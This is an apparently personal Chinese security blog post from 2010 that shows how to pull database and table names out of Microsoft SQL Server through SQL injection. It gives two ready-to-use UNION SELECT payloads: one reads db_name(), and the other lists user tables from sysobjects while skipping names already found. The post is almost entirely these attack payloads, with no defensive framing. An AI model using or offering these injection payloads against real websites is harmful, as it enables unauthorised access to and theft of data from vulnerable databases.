alibaba
网络安全点点滴滴...
2010年1月28日星期四
MSSQL 分析表名
MSSQL下分析表名的方法:
1。先db_name()分析出数据库名
~and 1=2 union select
db_name()
2。接着用以下语句分析表名(假设数据库名为dbname)
~and 1=2 union all
select name from dbname..sysobjects WHERE xtype = 'U' AND name NOT IN(SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55)
没有评论:
发表评论
较新的博文
较早的博文
主页
订阅:
博文评论 (Atom)
没有评论:
发表评论